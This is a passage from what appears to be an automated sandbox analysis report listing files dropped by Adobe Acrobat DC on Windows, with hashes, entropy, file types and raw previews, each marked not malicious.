                                                                    SHA-512:52AD27DC0C23B009959B0B39FE4DB67A51CE465C499E1879A8CD9E9EA8D5B9A451508875EDC816CB241D6BE3461D899A61C01EB52D2EDDD773F04D30BDBFF8D4
                                                                    Malicious:false
                                                                    Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):332
                                                                    Entropy (8bit):5.215436209346717
                                                                    Encrypted:false
                                                                    SSDEEP:6:6q2PcNwi2nKuAl9OmbzNMxIFUt8YZmw+37kwOcNwi2nKuAl9OmbzNMFLJ:6vLZHAa8jFUt8Y/+3754ZHAa84J
                                                                    MD5:C52B0782351F316DA9E884236EA1DA66
                                                                    SHA1:19FEFC98D10F2CA74784F9D162ADA6A8B932E495
                                                                    SHA-256:374701C8FA8B39A52FA4F3A66F8B35BA2067C988DD7420CE5C82516EC1760F51
                                                                    SHA-512:1AD74F24A56FAAF5CF3E79253A4E42AE271E325E3C4A75050889CA4E760F046073845FEB4EF1D21AF0D35461FF63C1B3429C5FB685DF7C9D6F90C4D1A26088B2
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.663 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:37.674 1df0 Recovering log #3.2024/12/23-07:37:37.691 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):332
                                                                    Entropy (8bit):5.215436209346717
                                                                    Encrypted:false
                                                                    SSDEEP:6:6q2PcNwi2nKuAl9OmbzNMxIFUt8YZmw+37kwOcNwi2nKuAl9OmbzNMFLJ:6vLZHAa8jFUt8Y/+3754ZHAa84J
                                                                    MD5:C52B0782351F316DA9E884236EA1DA66
                                                                    SHA1:19FEFC98D10F2CA74784F9D162ADA6A8B932E495
                                                                    SHA-256:374701C8FA8B39A52FA4F3A66F8B35BA2067C988DD7420CE5C82516EC1760F51
                                                                    SHA-512:1AD74F24A56FAAF5CF3E79253A4E42AE271E325E3C4A75050889CA4E760F046073845FEB4EF1D21AF0D35461FF63C1B3429C5FB685DF7C9D6F90C4D1A26088B2
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.663 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:37.674 1df0 Recovering log #3.2024/12/23-07:37:37.691 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123743Z-236.bmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                    Category:dropped
                                                                    Size (bytes):66934
                                                                    Entropy (8bit):2.436424201832609
                                                                    Encrypted:false
                                                                    SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                    MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                    SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                    SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                    SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                    Malicious:false
                                                                    Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                    Category:dropped
                                                                    Size (bytes):86016
                                                                    Entropy (8bit):4.439138148953171
                                                                    Encrypted:false
                                                                    SSDEEP:384:yeaci5GGiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1OurVgazUpUTTGt
                                                                    MD5:88CACB9BAE765C16D60358A349D1A7B9
                                                                    SHA1:206272E6FBE45A9474A99B48FD2123968B90BB38
                                                                    SHA-256:355C4178922536A05CEBF3314ACEE939E5F6107524D8392A1F24E151647D54C1
                                                                    SHA-512:2E96C45BE08E3C0D486A8A8DEFB697B9DF97C8157F6238C3B8691B731BDE2F17236C360FC199ECA0C49717B538A2A0617E8312B78B7CA6A8D424A2D8FF5D64EF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:SQLite Rollback Journal
                                                                    Category:dropped
                                                                    Size (bytes):8720
                                                                    Entropy (8bit):3.77720792223578
                                                                    Encrypted:false
                                                                    SSDEEP:48:7M5p/E2ioyVaioy3DoWoy1CABoy1mKOioy1noy1AYoy1Wioy1hioybioy8oy1noS:7qpjua0iAyXKQ9Ub9IVXEBodRBks
                                                                    MD5:0E8A90B8F69472738B27C2FBFA59DD81
                                                                    SHA1:E7B581CCCD18055BBA78BA594CF6D80C40CEDEE7
                                                                    SHA-256:66EAAA31D384F315CCF49D5B1B59A69315F3FC7D5553A4D9BBAAD6F560F7566A
                                                                    SHA-512:545360EADB01BCE242DAA5BD30EF382D9699B12F4A7C65CA312EE2FD591CC514532987522E5F95FF2076793419F1C1A99280BF4AD22B2988AA922A3EC80073CC
                                                                    Malicious:false
                                                                    Preview:.... .c.......L...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Certificate, Version=3
                                                                    Category:dropped
                                                                    Size (bytes):1391
                                                                    Entropy (8bit):7.705940075877404
                                                                    Encrypted:false
                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                    Malicious:false
                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):71954
                                                                    Entropy (8bit):7.996617769952133
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                    Malicious:false
                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):192
                                                                    Entropy (8bit):2.750416612246742
                                                                    Encrypted:false
                                                                    SSDEEP:3:kkFklrKftvfllXlE/HT8k1HzlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKZVQT88XNMa8RdWBwRd
                                                                    MD5:94803E159EEB409AFD3DD73E76BEFFCA
                                                                    SHA1:DC877BDD532CD2EFAEAD3E441AEABA5E0CCBB161
                                                                    SHA-256:274E8243621CD10797C67A506F5239EEC3CF424FDD998014B4B37A4FF9F490D4
                                                                    SHA-512:58082D87CE290BA9489370C00D9B228254C4A66E12C751CA89EF12DF1E513E1A8A0666D999C7154C6AEFD9B9972FB9441B544B5206EA6C34943A427E923254F0
                                                                    Malicious:false
                                                                    Preview:p...... ........X/.y7U..(....................................................... ..........W...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):328
                                                                    Entropy (8bit):3.247897867253901
                                                                    Encrypted:false
                                                                    SSDEEP:6:kK/9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:2DImsLNkPlE99SNxAhUe/3
                                                                    MD5:A5AB5CF305B4D51BD7BF6DC3E1886076
                                                                    SHA1:7B11FF9382A8C25B2346A192754254C735C86C62
                                                                    SHA-256:537190E903912577572931D12DF7D3997FAF8B4F9B983A2009B3DDA6E89F79A0
                                                                    SHA-512:057A9572BAD2856466D0F1CA01F4CA49BB74FF424759078A203B089BA600CE0E5F40178ABC73564E43036AD5542323BC2B0AFF81E5098BA6EA7D3BD5315FD189
                                                                    Malicious:false
                                                                    Preview:p...... ...........z7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.372007030036697
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJM3g98kUwPeUkwRe9:YvXKXtjL1bsdTeOsDGMbLUkee9
                                                                    MD5:073A36221CADA8A60D3A0C40A202A98D
                                                                    SHA1:87C01F66744048678CFF96F0165FB456C1D6901F
                                                                    SHA-256:B4D331322CB5EC13A71A7F7A0AE4F321CA3B2BE5D306D9EC1ADBAA0157BBCA2B
                                                                    SHA-512:B3ADD515144667ADF4C31122227872D8E02F80187CE6AAA40C4F94E8ED77F71DB783EA7994863398376D36E4537351B1F6E51AED42464D59B2FD29B1DAB15987
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.3087400722597025
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfBoTfXpnrPeUkwRe9:YvXKXtjL1bsdTeOsDGWTfXcUkee9
                                                                    MD5:20F5D8A940A3622C32E1FA543AB7B1A7
                                                                    SHA1:055072A243A6BF9011C078B0FA164630404FC7C1
                                                                    SHA-256:08EBA7D515295453E2BD1C08E3DFE2F7B9068FDBBDCA36EC4D37D7F8A22112E4
                                                                    SHA-512:99A81C9A7458D396DABEF0BE08AECC491BBF27306E966200B4C3D73C93BE130DA81940B7971B441A1991140CD31D4D215D8770ED97A80C1852FE25E3C9ED96F6
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.28687898700497
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfBD2G6UpnrPeUkwRe9:YvXKXtjL1bsdTeOsDGR22cUkee9
                                                                    MD5:B9329EC3182C1B6411CB4685DEEA4B33
                                                                    SHA1:C9402A5EEE31772AC6B7FF3CC8C6233A9AC4FA17
                                                                    SHA-256:A1992C0B20D92EEEFE63543349E3251848CC6590D7382642BF805E3EBDAF5265
                                                                    SHA-512:4E184C209A2AE95B340B6B29C740B373DF0ED6BB389D740D140B8E4E3C02C5B248DCDA4B5441E334C58CE4BCB24F2DFAC173F2A98FAACDAA674E1167A0686913
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):285
                                                                    Entropy (8bit):5.359188618936057
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfPmwrPeUkwRe9:YvXKXtjL1bsdTeOsDGH56Ukee9
                                                                    MD5:B947C16C692A73DD9FCC0A854BE0D6D9
                                                                    SHA1:F31B564483377559E3AB734F2D15B8CC61129812
                                                                    SHA-256:8F8003C0B6FF9F89EE8BB9DD1841131A482BB0559453D9AD3013F35427C3716B
                                                                    SHA-512:969732436F0682B01EB906483EA1A2063D523DA87371AC6D60A5AE40CDC1F537E1B14121215CC58AEB83545DBEFFDA34B23B24DEAAB239EBBDF3B09FC3CFA153
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1123
                                                                    Entropy (8bit):5.683556193057035
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6XtjdmeOsYpLgE9cQx8LennAvzBvkn0RCmK8czOCCSGr:YvHeWhgy6SAFv5Ah8cv/s
                                                                    MD5:8A8720C46DEF4CFAEA983CB2FDFFF230
                                                                    SHA1:A7CDC583F9F0F5C7101C20DD8A27D7B090D952E3
                                                                    SHA-256:3BB31C699268C23ED3BF7A032A7FBF857F9A17E5C1656663CF1FD66260CCB516
                                                                    SHA-512:41CCE2C42441F72BB9290709FEFE4FE6894FEDFC0CFAD61209FB51803703DC518E3A56AF5A85DAB67E6F1E20EC1D282327E1E89FE6C4D783EF7C120C62D73E13
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.294176939637967
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJf8dPeUkwRe9:YvXKXtjL1bsdTeOsDGU8Ukee9
                                                                    MD5:4784338E2E7A5DC842A5358A697F309F
                                                                    SHA1:D4353DDE43AE9EBD6E0715BC07F46E0CCB1607EB
                                                                    SHA-256:814FC1E376BB977292131153F2006286D8531C9F9D3BCD5A38FA61AC4F317782
                                                                    SHA-512:EE4D292E6E677EF014B75B8C4CF7FF09584E06BAC3276EAECA4F345D2053584CB6DD4D5C0CA7F209B29798E91AB77E033B90DBEC8E511EF772B82BF3168D090F
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.298137401224926
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfQ1rPeUkwRe9:YvXKXtjL1bsdTeOsDGY16Ukee9
                                                                    MD5:94C710A90715A0ACC046B1D9DB430DEC
                                                                    SHA1:40C3197C1CCE7AA025BF44A865BC72836B2518A0
                                                                    SHA-256:40A4F6C248ABB9A727A79A8AEFF206ECCE1F6752D34B924091BFF6D2D43F3FD0
                                                                    SHA-512:F11B0D46918F06997E7BD1FD2E223F167E3388667E3281DF03B38D012D47EB45965977BD6EAF31ADC6369C8F7CD9A73C7D99ADCDB38FD4ADDCC50E02A939C308
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.3140925922665
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfFldPeUkwRe9:YvXKXtjL1bsdTeOsDGz8Ukee9
                                                                    MD5:060A6721B8163F6AB3078577AACA30D7
                                                                    SHA1:D0E82FE1AE65B7F758B8833A3D6D73A2DFB2F6CC
                                                                    SHA-256:3464D63E8B0A74349B7475A9C26BF47535E34EFDF375B76F393D2737C2213431
                                                                    SHA-512:DCCDA5092477D75F839D191F95AB2D354B4E5B601D903CFB1B9E9CFBF676DF3CFADB26225C02C8D4A70807A39741E1D55023063BB557416EC225FB74055EFA18
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.320872634599077
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfzdPeUkwRe9:YvXKXtjL1bsdTeOsDGb8Ukee9
                                                                    MD5:EE7B575754CC51FFBD4D06DCEF25C781
                                                                    SHA1:6DD313024432C736154E262520797BAB43D4E71E
                                                                    SHA-256:FD830F049FFA033621ADAFEDAC0F5499BD0A54AFC1ED8BA98405AA0282880148
                                                                    SHA-512:4E31114B4F3D8107F620D13FB7C23C16CEED6A224C83F2F5619C3E674DA7BCCC4393D0B3587D1122CBDB55A3AEF50A2870424A52217AD9A8F9388279F62A6A35
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"36c4d023-bac6-420c-b36a-3468eb0e7b8d","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735130869535,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.301547706376511
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXtQs6Pi14WsGiIPEeOF0YMjUoAvJfYdPeUkwRe9:YvXKXtjL1bsdTeOsDGg8Ukee9
                                                                    MD5:92AE0C5ADA47793FBDF52140FC97D765
